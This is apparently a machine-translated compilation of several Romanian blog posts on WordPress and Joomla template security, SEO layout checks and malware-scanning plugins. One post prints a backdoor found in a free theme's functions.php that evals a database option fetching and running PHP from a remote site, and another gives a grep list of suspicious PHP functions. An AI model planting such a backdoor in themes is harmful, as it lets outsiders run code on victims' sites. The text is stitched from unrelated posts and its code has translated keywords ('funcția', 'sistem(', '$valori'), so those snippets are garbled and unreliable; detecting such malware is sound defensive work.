Bună ziua, dragi cititori ai blogului. În zilele noastre sunt puțini webmasteri care își creează singuri site-ul (folosind Html pur, propriul lor motor, sau cel puțin folosind șabloane create de sine pentru CMS). În general, acest lucru este adevărat, deoarece nu toată lumea este capabilă să creeze ceva care merită - acest lucru necesită talentul unui designer. Cel mai adesea se dovedește a fi cel puțin „nu foarte bun” și uneori „pur și simplu îngrozitor”.

De aceea, șabloanele sau temele de design (în diferite motoare, „skins” pot fi denumite prin diferiți termeni) pentru CMS populare au devenit atât de răspândite. Mai ales multe din această bunătate pot fi găsite pe Internet pentru Joomla și WordPress, pentru că așa este pe bună dreptate, atât în ​​RuNet, cât și în internetul burghez.

De fapt, există deja destul de multe resurse în limba rusă cu cataloage de șabloane gata făcute. Ei bine, în burghezie nu există cum să le numărăm. Totul pare atât de minunat - instalați motorul, găsiți un șablon potrivit (nu este un secret că șabloanele plătite nu sunt atât de greu de găsit gratuit), descărcați-l și bucurați-vă de designul profesional al site-ului dvs. nou-nouț. Tot ce rămâne este să adăugați conținut valoros la acesta și veți putea urmări cum crește popularitatea resursei dvs. pe Internet.

Dar nu totul este atât de simplu și evident. Când am scris un articol cu ​​mult timp în urmă, am primit destul de regulat de la cititori prin poștă recomandări pentru a elimina cutare sau cutare serviciu din listă, pentru că în cele postate acolo link-uri ascunse sau chiar viruși se găsesc în șabloane. Se pare că proverbul nu minte - brânză gratuită se întâmplă doar într-o capcană pentru șoareci. Dezvoltatorii de șabloane gratuite (sau cei care au „zero” plătite) pur și simplu câștigă bani în acest fel și, judecând după amploare, o mulțime.

Legăturile ascunse către resurse terțe (și adesea incluse pe lista neagră de motoarele de căutare) și cu atât mai mult virușii, pot distruge orice speranță de a vă promova resursa (sau le pot submina serios și vă pot strica nervii). Pentru asta poți, fie. Cum te poți proteja de toate acestea atunci când alegi un șablon?

Ce este în neregulă cu șabloanele gratuite pentru Joomla și WordPress?

De propria experiență Pot spune că este foarte greu pentru un „amator” să concureze cu un „profesionist”. La începutul acestei publicații, am oferit un link către un articol despre virușii care au infectat majoritatea site-urilor mele. Acest lucru s-a întâmplat în urmă cu mai bine de doi ani, iar în acest timp am repetat lupta epică pentru „puritatea codului” de mai multe ori, dar recidivele apar încă cu o regularitate de invidiat pe o serie de resurse infectate (fie se trimite spam de la acestea, fie un se formează ușa, apoi se întâmplă ceva complet de neînțeles pentru mine, ceea ce duce la o încărcare monstruos de mare asupra găzduirii).

În același timp, folosesc toate metodele disponibile unui „noob” pentru a căuta cochilii și alte uși din spate în codul acestor site-uri, dar din nou, repet că un amator pur și simplu nu poate concura cu un profesionist. Prin urmare, dacă credeți că puteți elimina cu ușurință un virus care s-a strecurat printr-un șablon, atunci cel mai probabil vă înșelați. Aceasta este o chestiune foarte tristă, teribil de enervantă (când activitatea virală, în ciuda tuturor eforturilor tale, apare din nou și din nou) și necesită mult timp și efort.

Aceeași se aplică și link-urilor ascunse. Este bine dacă întâlniți o opțiune pentru introducerea lor dintr-o epocă trecută, când ați putea pur și simplu să găsiți locul pentru a le introduce și a scăpa de ele pentru totdeauna, obținând în cele din urmă un șablon curat și gratuit. În cele mai multe cazuri, totul este mult mai complicat. Pentru a găsi unde să inserați link-uri ascunse veți avea nevoie de software (de exemplu, pluginul TAC), dar nu este omnipotent, deoarece afacerea de a distribui link-uri prin șabloane gratuite și plătite (hacked) pentru Joomla și WordPress aduce venituri foarte bune, ceea ce îi încurajează pe cei care îl practică să caute soluții noi care să facă „marcajul” lor mai puțin vizibil.

De fapt, astăzi poate fi destul de dificil să verifici chiar și rapid un șablon pentru generarea de „linkuri din stânga”. De exemplu, ai descărcat un șablon, l-ai pus pe site, ai adăugat conținut și te-ai hotărât să vezi dacă din el au apărut unele suspecte (neintroduse de tine). link-uri externe. Nu există niciunul. Sunteți mulțumit, uitați de această problemă, sunteți ocupat să umpleți site-ul și să-l promovați și apoi dintr-o dată descoperiți accidental (pe cont propriu sau după un semnal de la motoarele de căutare sub formă de filtru sau interdicție) că mai există link-uri ascunse. și duc la astfel de „noroc”, la care nici măcar nu te-ai gândi să te referi.

Cel mai ofensator lucru la asta este că pentru a elimina filtrul și a „albi” site-ul în ochii motoarelor de căutare Poate dura foarte mult timp (luni și chiar ani în unele cazuri). Dar ideea aici este că dezvoltatorii unor astfel de „marcaje” sunt conștienți că știți despre ele și verifică site-ul după instalarea șablonului pentru „tot felul de excese rele”. Prin urmare, ei încetinesc începutul generării tocmai a acestor link-uri de ceva timp, suficient în opinia lor pentru ca și cel mai suspicios utilizator să creadă în puritatea șablonului pe care l-a primit gratuit.

Mai mult, legăturile ascunse sunt acum codificate în așa fel încât să nu fie căutate folosind cuvintele md5 sau base64 (deseori sunt încărcate dintr-o sursă externă). Doar un set de litere și caractere speciale care nu pot fi găsite căutând prin toate fișierele șablon. Și ar putea fi mai mult de o sută din aceste fișiere. În plus, linkurile nu apar imediat. Adică, de fapt, este imposibil ca un webmaster (media) să le detecteze în stadiul creării unui site web.

Ei bine, pentru a evita infectarea prin șablon, eu Prefer să plătesc bani pentru a nu avea de-a face mai târziu cu o grămadă de probleme. Un alt lucru este că poți plăti mulți bani, sau nu poți plăti foarte mult. Eu personal aleg a doua opțiune, dar mai întâi voi explica esența primei.

Ceva, desigur, poate fi găsit și în depozitele oficiale ale acestor motoare(citiți despre asta și accesați site-ul oficial de extensii pentru Joomla), dar, în primul rând, alegerea acolo este semnificativ limitată și, în al doilea rând, multe mii de site-uri din întreaga lume vor fi îmbrăcate în aceleași „haine”, ceea ce reduce oarecum unicitatea proiectului dumneavoastră atât în ​​ochii vizitatorilor, cât și în ochii motoarelor de căutare.

Cu toate acestea, există multe companii profesionale în lume care dezvoltă șabloane plătite pentru Joomla și WordPress. A priori (), nu ar trebui să aibă marcaje, altfel își vor pierde instantaneu autoritatea și încrederea clienților. Cu toate acestea, prețul pentru un șablon poate fi de 50-100 de dolari, în funcție de funcționalitatea și noutatea acestuia.

În plus, pot apărea unele probleme cu plata (va trebui fie să vă asumați un risc și să faceți o achiziție cu plată direct de la card de plastic). Cu toate acestea, ca rezultat, veți primi un șablon în mod deliberat „curat”, ceea ce este bun. Adevărat, suportul tehnic care vine cu acesta va fi relevant doar dacă cunoști limba în care este furnizat. În cele mai multe cazuri, cunoașterea limbii ruse nu vă va ajuta în această problemă.

Îmi place mai mult a doua opțiune datorită rentabilității sale mai mari (raportul dintre banii cheltuiți și oportunitățile primite), deși în raport cu dezvoltatorii nu este în întregime „albă”. Esența sa este că Joomla și WordPress distribuit sub o licență GNU/GPL, adică licențe gratuit software(un astfel de software poate fi folosit, copiat, modificat și distribuit). De fapt, am mai scris despre asta în articolul despre șabloanele Joomla menționat la început.

Fără a intra în prea multe detalii, ideea este că extensiile (șabloane, pluginuri etc.) pentru aceste motoare nu pot fi proprietatea privată a autorilor. Da, puteți cere plata pentru ele, dar nu va mai fi posibilă pedepsirea sau urmărirea penală pentru utilizarea sau distribuirea neautorizată a acestor extensii. În ciuda acestui fapt, piața extensii plătite pentru Joomla și WordPress este uriaș, deși neprotejat de legea dreptului de autor. Dimpotrivă, licența GNU/GPL te protejează 100% de dezvoltator.

Multe companii de dezvoltare, apropo, oferă acces la șabloanele lor prin abonament. Aceste. plătiți o anumită sumă și pentru un anumit timp puteți descărca și continua să utilizați toate creațiile lor (șabloane sau extensii) în mod continuu. De fapt, a doua cale primire sigură Temele de design pentru WordPress, precum și șabloanele pentru Joomla, sunt construite pe aproximativ același principiu.

Nu cu mult timp în urmă, un prieten de-al meu, despre care l-am pomenit în mai multe articole, „mi-a arătat cu degetul” (căută de câțiva ani varianta ideală pentru construirea unui magazin online și pe această cale găsește o mulțime de lucruri care mi se par interesante și sunt folosite activ în viitor) . Vorbim despre punerea în comun a șabloanelor și extensiilor premium CmsHeaven.org .

Esența strângerii de fonduri este destul de simplă - cumpărați un produs și distribuiți-l tuturor celor care au participat la strângere de fonduri. CmsHeaven.org a simplificat și mai mult schema - nu este nevoie să plătiți șabloane sau extensii individuale de care aveți nevoie. Plătiți pur și simplu pentru accesul temporar la întregul catalog pe care acest serviciu îl are la dispoziție (câteva mii de titluri, împărțite pentru ușurința căutării pe motoare, autori și subiecte).

Fiecare dintre produsele prezentate a fost achiziționat sincer de la dezvoltatori cu banii deponenților (există și șabloane gratuite, dar din nou sunt prezentate de mărci cunoscute de care au nevoie în scop publicitar). Și ceea ce este important, organizatorii actualizează în permanență catalogul cu exemplare noi (în căldura momentului, după cum se spune), care va trebui să aștepte mult timp în public. Multora le va placea asta.

În general, aceasta este o cooperativă în care vă puteți alătura și vă puteți bucura de toate beneficiile. Dar cu unele restricții. Cert este că organizatorii știu bine că, fără a introduce restricții, întregul lor catalog se va scurge publicului într-o chestiune de timp. Prin urmare are loc limită la 36 de descărcări pe lună. Acest lucru este suficient pentru un webmaster obișnuit și chiar pentru o companie de creare de site-uri web.

Acest lucru garantează absentaîn extensiile și șabloanele prezentate "semne de carte"(legături ascunse, viruși, troieni și snitches care informează dezvoltatorul despre site folosind șablonul lor). Având în vedere acest lucru, sunt achiziționate numai produse de la mărci cunoscute sursă deschisă, unde puteți verifica toate acestea și, dacă este necesar, le puteți elimina.

Unele dintre extensii au fost traduse în limba rusă și, dacă apar probleme cu instalarea sau configurarea, ceea ce este adesea foarte necesar (probabil că ați pieptănat Internetul de mai multe ori în căutarea unei soluții la o problemă care a apărut din senin) . Acesta, apropo, este ceea ce distinge motoarele gratuite de cele plătite, că nu există suport pentru utilizatori ca atare.

Da, și puteți descărca produsele care vă plac viteza normalași fără a vizualiza reclame la serviciile de găzduire de fișiere. Este un fleac, pentru că pentru a obține râvnitul „drăguț” poți muta munții și nu doar să te lupți cu un serviciu de găzduire de fișiere, ci măruntaiele sunt cele care compun confortul.

În general, mi-a plăcut foarte mult ideea și implementarea ei, dar ar trebui să folosesc șabloane gratuite din depozitele Joomla și WordPress, ar trebui să mă alătur pe CmsHeaven.org sau să cumpăr șabloane direct de la dezvoltatori? va trebui să decideți singur. Doar „te implor, nu mănânci roșii crude noaptea”, adică nu descărcați produse gratuite din orice resurse „minunate”, pentru că puteți ajunge cu o mulțime de probleme. Ai nevoie de ea?

Mult succes pentru tine! Ne vedem curând pe paginile site-ului blogului

S-ar putea să fiți interesat

Cum să inserați codul de contor de vizite într-un site care rulează Joomla folosind modulul de cod HTML personalizat sau direct într-un șablon
Cum să creezi singur un site web profesional pentru cărți de vizită fără cunoștințe de Html, CSS și PHP? Răspuns: MotoCMS!
Cum să obțineți un șablon adaptiv pentru un viitor site web și, odată cu acesta, un CMS intuitiv și rapid de pornit
10 greșeli mortale la scrierea și publicarea articolelor
Crearea unui element de meniu în Joomla pentru a intra pe forum și transferul înregistrării utilizatorului de la SMF pe site
Configurarea JFusion pentru fuziune forum SMFși site-ul Joomla
Module JFusion pentru afișarea mesajelor de pe forum pe site, precum și crearea unui buton în SMF pentru a reveni la Joomla WebPoint PRO - temă receptivă pentru WordPress cu funcționalitate largă și tehnică competentă optimizarea motoarelor de căutare
Share42 - script pentru adăugarea de butoane pe site rețelele socialeși marcaje (există o opțiune de panou plutitor)
Instalarea forumului SMF - Integrarea Joomla 1.5 și Forumul Simple Machines folosind componenta JFusion

Odată ce ați ales un șablon pentru a-l instala pe site-ul dvs. WordPress, merită să verificați aspectul acestuia pentru respectarea regulilor de bază ale SEO (optimizare). De exemplu, șablonul de casetă „Twenty Fourteen” este așezat astfel încât titlurile widgetului să fie afișate în etichete

Extrem de greu de găsit pregătit Șablon WordPress satisfacându-ți complet nevoile. Destul de des, vă place șablonul selectat, dar nu sunteți mulțumit de schema lui de culori sau nu vă place locația barei laterale, antetului, fontului etc. Platforma WP are toate posibilitățile de a schimba șablonul WordPress pentru a se potrivi nevoilor dumneavoastră.

De exemplu, să modificăm un șablon WordPress în casetă numit „Twenty Fourteen”. Acest șablon va servi drept exemplu practic, pe care puteți vedea toate nuanțele fine și nu numai reglaj finȘabloane WordPress.

Se pregătește editarea șablonului

Înainte de orice lucru cu codul WordPress, inclusiv schimbarea șablonului de lucru, trebuie să faceți și să aveți la îndemână:

• (catalog și bază de date);
• O copie de rezervă a șablonului de lucru (editabil).

Șablonul trebuie configurat anterior în filă Aspect→Setări.

Nota: Pentru a face modificări permanente șablonului, trebuie să accesați . Rularea pe o temă copil WordPress vă permite să actualizați șablonul fără a pierde modificările.

Cum să personalizați șablonul WordPress „Twenty Fourteen” pentru dvs

Voi încerca să arăt principiul schimbării unui șablon, care vă va permite să faceți propriile modificări oricărui șablon WordPress.

Deci, sarcina: Există un șablon „Twenty Fourteen” fotografie 1, facem modificări personalizate șablonului, în același timp, verificăm aspectul șablonului pentru a asigura respectarea regulilor Optimizare SEO.

Nota: Observ că autorii multor șabloane creează setări reconfigurabile pentru șablonul lor, afișând interfața de setări într-o filă separată. Când lucrați cu astfel de șabloane, puteți seta cu ușurință setări personalizate pentru șabloane fără a modifica codul șablonului. Aceasta nu este o opțiune descrisă în acest articol.

Verificarea aspectului șablonului pentru regulile SEO

Să ne uităm mai întâi la aspectul șablonului. Înainte de a verifica, setați setările necesare pentru șablon.

Pentru a verifica aspectul pentru conformitatea cu regulile SEO, vom avea nevoie de:

• Plasați orice widget pe bara (barele) laterale ale șablonului. Să fie un calendar. Cu siguranță vom da un nume widget-ului.
• Creați o pagină de testare și o postare pe site-ul de testare.

Pași pentru a verifica aspectul șablonului pentru regulile SEO

Pasul 1: Verificarea paginii de pornire

Important! Nu ar trebui să existe mai mult de două etichete h1 pe orice pagină a site-ului. Un deschizător

, a doua închidere

, acest lucru trebuie remediat. Remedierea este chiar mai jos.

repet! Nu ar trebui să existe mai mult de două etichete h1 pe orice pagină a site-ului. Un deschizător

, a doua închidere

Pasul 2. Testarea paginii postului de testare

După pagina principală a site-ului, deschidem postarea de testare a site-ului. Aici verificăm că numai titlul postării este împachetat în etichete h1. Facem verificarea în același mod ca și postarea site-ului. Doar titlul paginii ar trebui să fie împachetat cu etichete h1.

Pasul 3: Verificarea widgeturilor

În mod similar, uitați-vă la etichetele de titlu ale widget-urilor din bara laterală și subsol.

Rezultatele verificării aspectului

Drept urmare, verificând aspectul șablonului de pe acest șablon, am constatat că anteturile widgetului din subsolul și bara laterală a site-ului sunt împachetate în etichete h1. Acest lucru trebuie reparat.

Dacă am găsit asta pagina de start anunturile articolelor sunt afisate in tag-uri h1, adica pe pagina celor mai recente postari, exista mai multe titluri in h1, citim articolul si eliminam aceasta eroare de layout SEO.

Subiectul articolului s-a dovedit a fi mai amplu decât mă așteptam, așa că va trebui să schimb șablonul WordPress după mine, și anume, să-i schimb aspectul, o vom face în următorul articol. În primul rând, puteți citi articolele: Reguli de aspect pentru un fișier de stil în cascadă WordPress.

WordPress este cel mai popular motor pentru crearea diferitelor site-uri web și bloguri de informații. Securitatea site-ului dvs. este mai mult decât securitatea datelor dvs. Acest lucru este mult mai important, deoarece este și siguranța tuturor utilizatorilor care citesc și au încredere în resursa dvs. De aceea este atât de important ca site-ul să nu fie infectat cu viruși sau orice alt cod rău intenționat.

Vom analiza cum să protejăm WordPress de hacking într-unul dintre următoarele articole, dar acum vreau să vă spun cum să verificați un site web WordPress pentru viruși și coduri rău intenționate pentru a vă asigura că totul este în siguranță.

Prima opțiune care vă vine în minte este că ați fost piratat de hackeri și ați construit ușile din spate în codul site-ului dvs. pentru a putea trimite spam, pune link-uri și alte lucruri rele. Acest lucru se întâmplă uneori, dar acesta este un caz destul de rar dacă actualizați software-ul la timp.

Există mii de teme WordPress gratuite și diverse plugin-uri, iar acest lucru ar putea fi deja o amenințare. Una este când descărcați un șablon de pe site-ul WordPress și alta este când îl găsiți pe site-ul din stânga. Dezvoltatorii fără scrupule pot încorpora diferite coduri rău intenționate în produsele lor. Riscul este și mai mare dacă descărcați gratuit șabloane premium, unde hackerii, fără a risca nimic, pot adăuga un fel de gaură de securitate prin care apoi să pătrundă și să facă ceea ce au nevoie. Acesta este motivul pentru care verificarea unui site WordPress pentru viruși este atât de importantă.

Verificarea unui site WordPress pentru viruși

Primul lucru la care trebuie să apelezi când verifici un site nu sunt viruși, acestea sunt pluginuri WordPress. Rapid și ușor, puteți să vă scanați site-ul și să găsiți zone suspecte de cod cărora merită să le acordați atenție, indiferent dacă acestea sunt în tema, plugin-ul sau nucleul Wodpress. Să ne uităm la câteva dintre cele mai populare plugin-uri:

1.TOC

Acest plugin foarte simplu verifică toate temele instalate pe site-ul tău pentru a vedea dacă conțin cod rău intenționat. Plugin-ul detectează legăturile ascunse criptate folosind inserarea codului base64 și, de asemenea, afișează informații detaliate despre problemele găsite. Cel mai adesea, bucățile de cod găsite nu sunt viruși, dar pot fi potențial periculoase, așa că ar trebui să le acordați atenție.

Deschide "Aspect" -> "TAC" apoi așteptați până când toate subiectele sunt verificate.

2. Scanner VIP

Foarte similar cu scanerul TOC pentru subiecte, dar produce mai multe informatii detaliate. Aceleași capacități de detectare a legăturilor cod ascunsși alte inserții rău intenționate. Doar deschideți elementul VIP Scanner din secțiunea de instrumente și analizați rezultatul.

Poate fi suficient pentru a elimina fișiere suplimentare de exemplu desktop.ini. Sau trebuie să vă uitați mai detaliat la ceea ce se întâmplă în fișierele care utilizează base64.

3. Anti-Malware de la GOTMLS.NET

Acest plugin vă permite nu numai să scanați temele și nucleul site-ului pentru viruși, ci și să protejați site-ul împotriva parolelor de forță brută și a diferitelor atacuri XSS, SQLInj. Căutarea se efectuează pe baza semnăturilor și vulnerabilităților cunoscute. Unele vulnerabilități pot fi remediate pe site. Pentru a începe scanarea fișierelor, deschideți „Anti-Malvare”în meniul lateral și faceți clic „Run Scan”:

Înainte de a putea executa o scanare, trebuie să actualizați bazele de date de semnături.

4. Wordfence

Acesta este unul dintre cele mai populare pluginuri pentru securitatea WordPress și scanarea programelor malware. În afară de scaner, care poate găsi majoritatea marcajelor în Cod WordPress, există o protecție constantă împotriva diferitelor tipuri de atacuri și forța brută a parolei. În timpul căutării, pluginul găsește posibile probleme cu diverse plugin-uri și teme, raportează necesitatea de a actualiza WordPress.

Deschide fila "WPDefence"în meniul lateral și apoi accesați fila "Scanare"și apăsați „Începe scanarea”:

Scanarea poate dura anumit timp, dar la finalizare veți vedea un raport detaliat al problemelor găsite.

5. AntiVirus

Acesta este un alt plugin simplu care va scana șablonul site-ului dvs. pentru cod rău intenționat. Dezavantajul este că doar șablonul curent este scanat, dar informațiile sunt afișate suficient de detaliat. Veți vedea toate funcțiile periculoase care sunt în temă și apoi puteți analiza în detaliu dacă prezintă vreun pericol. Găsiți un articol „AntiVirus”în setări și apoi faceți clic „Scanați acum șabloanele de teme”:

6. Verificator de integritate

De asemenea, este recomandabil să verificați integritatea Fișiere WordPress, în cazul în care virusul s-a înregistrat deja undeva. Puteți utiliza pluginul Integrity Checker pentru aceasta. Verifică toate fișierele de bază, plugin și șablon pentru modificări. La sfârșitul scanării, veți vedea informații despre fișierele modificate.

Servicii online

Există, de asemenea, mai multe servicii online care vă permit să verificați un site WordPress pentru viruși sau să verificați doar șablonul. Iată câteva dintre ele:

themecheck.org- descărcați arhiva temei și puteți vedea toate avertismentele despre posibilele funcții rău intenționate care sunt utilizate în ea. Puteți nu numai să vizualizați informații despre tema dvs., ci și despre alte teme încărcate de alți utilizatori, precum și versiuni diferite subiecte. Orice plugin-uri găsesc poate fi găsit pe acest site. Verificarea temei dvs. WordPress este, de asemenea, foarte importantă.

virustotal.com- o resursă binecunoscută unde vă puteți verifica site-ul web sau fișierul șablon pentru viruși.

ReScan.pro - Verificați WordPress site-ul web pentru viruși care utilizează acest serviciu este gratuit, se efectuează analize statice și dinamice pentru a detecta posibile redirecționări, scanerul deschide paginile site-ului. Verifică site-ul cu diverse liste negre.

sitecheck.sucuri.net- un serviciu simplu pentru scanarea site-urilor și a subiectelor pentru viruși. Există un plugin pentru WordPress. Detectează link-uri și scripturi periculoase.

Verificare manuală

Nimic nu poate fi mai bun decât verificarea manuală. Linux are acest minunat utilitar grep care vă permite să căutați apariții de șiruri arbitrare într-un folder cu fișiere. Rămâne să înțelegem ce vom căuta:

eval - această funcție vă permite să executați cod PHP arbitrar, nu este folosit de produse care se respectă dacă unul dintre pluginuri sau o temă folosește această funcție, există o probabilitate de aproape 100% ca acesta să conțină un virus;

• base64_decode- funcțiile de criptare pot fi folosite împreună cu eval pentru a ascunde codul rău intenționat, dar pot fi folosite și în scopuri pașnice, așa că aveți grijă;
• sha1- o altă metodă de criptare a codului rău intenționat;
• gzinflate- functie de compresie, aceleasi scopuri, impreuna cu eval, de exemplu, gzinflate(base64_decode(code);
• strrev- întoarce linia înapoi nu înainte, deoarece o opțiune poate fi folosită pentru criptarea primitivă;
• imprimare- scoate informatii in browser, impreuna cu gzinflate sau base64_decode este periculos;
• fișier_put_conținut- WordPress în sine sau pluginurile pot crea în continuare fișiere în sistemul de fișiere, dar dacă tema face acest lucru, atunci ar trebui să fiți atenți și să verificați de ce face acest lucru, deoarece pot fi instalați viruși;
• file_get_contents- în cele mai multe cazuri folosit în scopuri pașnice, dar poate fi folosit pentru a descărca coduri rău intenționate sau pentru a citi informații din fișiere;
• răsuci- aceeași poveste;
• fopen- deschide un fișier pentru scriere, nu se știe niciodată în ce scop;
• sistem- funcția execută comanda în sistem Linux, dacă o temă, plugin sau wordpress în sine face acest lucru, cel mai probabil există un virus;
• link simbolic- creează legături simbolice în sistem, poate că virusul încearcă să facă cea principală sistem de fișiere accesibil din exterior;
• copie- copiază un fișier dintr-un loc în altul;
• getcwd- returnează numele directorului de lucru curent;
• cwd- modifică folderul de lucru curent;
• ini_get- primește informații despre setările PHP, adesea în scopuri pașnice, dar nu se știe niciodată;
• error_reporting(0)- dezactivează ieșirea oricăror mesaje de eroare;
• window.top.location.href - funcția javascript, folosit pentru redirecționări către alte pagini;
• tocat- așa că, pentru orice eventualitate, verificăm, brusc, hackerul însuși a decis să ne spună.

Puteți înlocui fiecare cuvânt individual într-o comandă ca aceasta:

grep -R "piratat" /var/www/path/to/files/wordpress/wp-content/

Sau folosiți un script simplu care va căuta toate cuvintele simultan:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
copie(
eval(
sistem(
link simbolic(
error_reporting(0)
imprimare
file_get_contents(
file_put_contents(
fopen(
tocat"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php „$valori” *

Salutare prieteni. Sunteți sigur că șablonul WordPress gratuit pe care îl utilizați pentru site-urile și blogurile dvs. este cu adevărat sigur și nu conține amenințări ascunse sau cod rău intenționat? Ești complet sigur de asta? Absolut?)

Crezi că ai rulat șablonul prin , ai eliminat link-urile ascunse din acesta și treaba este gata. Scanați periodic fișierele site-ului cu un antivirus, căutați instrumentele pentru webmasteri Yandex din fila Securitate și sunteți ușurat să vedeți mesajul acolo: „ Nu a fost detectat niciun cod rău intenționat pe site«.

Asa am crezut si eu. Nu aș vrea să te supăr, dar...

Cod periculos ascuns în șabloanele WordPress gratuite

Aceasta este scrisoarea pe care am primit-o săptămâna trecută prin e-mail de la compania mea de găzduire. Recent, au introdus o verificare regulată a tuturor fișierelor site-ului pentru a căuta conținut rău intenționat și au găsit acest conținut pe mine!

Totul a început când am intrat pe site-ul meu într-o după-amiază și nu l-am putut lansa - a apărut un mesaj abuziv despre fișierele cu extensia php care nu erau găsite. După ce m-am tensionat puțin, m-am dus să studiez conținutul folderului cu site-ul de pe găzduire și am descoperit imediat o problemă - fișierul meu șablon fuctions.php a fost redenumit în functions.php.malware, ceea ce părea să sugereze în mod ambiguu - un antivirus era lucrând aici sau ceva de genul asta) După ce am mers la poștă, am găsit raportul de mai sus de la gazdă.

Primul lucru pe care l-am făcut, desigur, a fost să verific acest dosar, i-a studiat conținutul, a scanat cu tot felul de antivirusuri, zeci servicii online pentru verificarea virușilor etc. — până la urmă nu s-a găsit nimic, toți au afirmat în unanimitate că dosarul este complet în siguranță. Bineînțeles, mi-am exprimat îndoielile hosterului, spunând că ați greșit ceva, dar pentru orice eventualitate, le-am rugat să furnizeze un raport privind detectarea unei bucăți de cod rău intenționate.

Și asta mi-au răspuns

Am intrat pe google informații despre acest cod și m-am gândit serios...

Cum să găsiți o bucată de cod rău intenționat într-un șablon

După cum se dovedește, aceasta este o tehnică cu adevărat non-trivială, care permite părților interesate să transmită date pe site-ul dvs. și să modifice conținutul paginilor fără știrea dvs.! Dacă utilizați un șablon gratuit, atunci Vă recomand cu căldură să verificați funcțiile.php pentru următorul cod:

add_filter('the_content', '_bloginfo', 10001);
funcția _bloginfo($conținut)(
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
returneaza $co;
) altfel returnează $conținut;
}

Chiar și cu cunoștințele mele foarte superficiale despre PHP, este clar că se creează un anumit filtru, legat de postarea și conținutul variabilei globale, care este responsabil pentru afișarea conținutului doar pe paginile postărilor de blog (condiția is_single). Deja suspect, nu? Ei bine, acum să vedem ce va rezulta. acest cod pe site-ul nostru.

Opțiunea interesantă blogoption cerută în baza de date pare și ea foarte suspectă. Să mergem la baza noastră de date Date MySQLși găsiți acolo un tabel numit wp_options, dacă nu ați schimbat prefixele, atunci va arăta astfel implicit. Și în ea găsim linia care ne interesează numită blogoption

Ce frumusețe! Vedem următoarea opțiune

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Aceste. De pe un anumit site (și unul rusesc, ține cont) ei returnează conținut care poate conține orice! Orice număr de link-uri, coduri rău intenționate, text modificat etc. Site-ul în sine dă o eroare de acces 403 atunci când îl accesați, ceea ce nu este surprinzător. Desigur, am eliminat și această opțiune din baza de date.

Conform informațiilor de la victime, conținutul exact al articolului dvs. este de obicei returnat cu o singură modificare - în loc de orice punct „”. un link deschis a fost ascuns în text! Și apropo, această opțiune este scris în baza de date atunci când șablonul în sine este instalat, iar apoi codul care face acest lucru se autodistruge cu succes. Și am trăit cu astfel de gunoaie timp de doi ani și nici un singur antivirus sau serviciu nu mi-a detectat-o această amenințare pentru tot acest timp. Sincer să fiu, nu am observat dacă această tehnică a funcționat vreodată pentru mine sau dacă pluginul meu de securitate a blocat această caracteristică (sau poate că una dintre actualizările WordPress a închis această gaură), dar este totuși neplăcut.

Morala despre brânza gratuită

Cum vă place rafinamentul „traducătorilor” noștri de șabloane (sau celor care le postează în cataloagele lor)? Acest lucru nu este pentru tine să decupezi link-urile din subsol) Păcat că nu-mi amintesc de unde mi-am descărcat șablonul, a fost cu mult timp în urmă, altfel aș fi scris cu siguranță câteva dintre ele afectuoase. Și dacă la acea vreme aș avea aceeași experiență pe care o am acum, cu siguranță nu aș fi folosit șablon gratuit, sau ca ultimă soluție, nu aș descărca din surse necunoscute!

Este mai ușor să cumperi un șablon premium oficial pentru 15-20 de dolari și să trăiești în pace, știind că nu există găuri sau legături criptate în el și, chiar dacă există vulnerabilități, dezvoltatorii vor lansa cu siguranță o actualizare în care aceste găuri vor fi. închis. ( Apropo, Artem a publicat recent un articol în care vorbește despre șabloane premium și chiar oferă coduri promoționale pentru reduceri brutale pentru cei interesați)

Salutare prieteni IdeaFox!

Nu știu despre tine, dar am probleme cu somnul noaptea. Sunt chinuit de problemele de securitate ale blogului. nu mai am putere :-)

Am citit o grămadă de bloguri pe acest subiect și am testat multe plugin-uri care ajută la rezolvarea acestei probleme. Și în comentarii au început să pună întrebări despre tema protecției site-ului, ceea ce m-a determinat să scriu această notă.

Imaginează-ți doar că ții un blog, scrii articole, încerci... Și nenorociți vin și îți sparg site-ul. Cred că va fi multă durere.

La urma urmei, fiecare blogger normal investește mult timp și efort în dezvoltarea site-ului său. Și pentru mulți, blogging-ul devine în general o obsesie... Aici și până când, dacă se întâmplă ASTA :-)

Ei bine, înțelegi cât de important este asta.

Sa trecem in sfarsit la treaba :)

Acum câteva luni am scris deja o notă despre hacking. Asigurați-vă că o citiți. Dar a trecut destul de mult timp de atunci și am luat măsuri suplimentare pentru a întări apărarea generală.

În notele următoare mă voi opri cu siguranță asupra acestei probleme în detaliu. (De asemenea, îmi amintesc și scriu despre setările ISP)

3. Verificați site-ul pe alte servicii online

Se pare că există o proliferare a unor astfel de servicii. Am o părere puternică că multe dintre ele sunt complet stupide și create exclusiv pentru afișarea reclamelor.

Doctor Web

Compania DR.Web realizată serviciu bun pentru a verifica site-urile online. Personal, el m-a ajutat odată să găsesc o infecție pe blogul unui prieten (în fișierul .htaccess era cod terță parte)

Verificarea este foarte simplă. Introduceți adresa URL și așteptați rezultatul verificării.

antivirus-alarm.ru

Un scaner puternic de site-uri web care utilizează până la 43 de baze de date antivirus de la cele mai importante companii antivirus din lume.

Totul este foarte simplu și aici. Introducem adresa URL a site-ului nostru și așteptăm cu răsuflarea tăiată rezultatele scanării.

Le asteptam pe astea.

Totul este curat, poti dormi linistit :-)

Toate acestea sunt bune, desigur, dar trebuie să instalați și câteva plugin-uri care nu vor strica deloc pentru blogurile WordPress.

4. Cereți gazdei să vă verifice site-ul

Faptul este că hosterii sunt și mai preocupați de problemele de securitate decât tine și au măsuri de securitate puternice. Mai mult, cu mijloace specializate de protecție.

Aceasta este vestea pe care o am pentru tine astăzi. În continuare, vă voi spune despre un plugin foarte puternic care vă poate proteja în mod semnificativ blogul WordPress de hacking.

Deja lucrez cu el de 2 luni și sunt foarte mulțumit de el. În timp ce mi-am dat seama, m-am interzis de 3 ori: –) Pe scurt, e ceva de spus.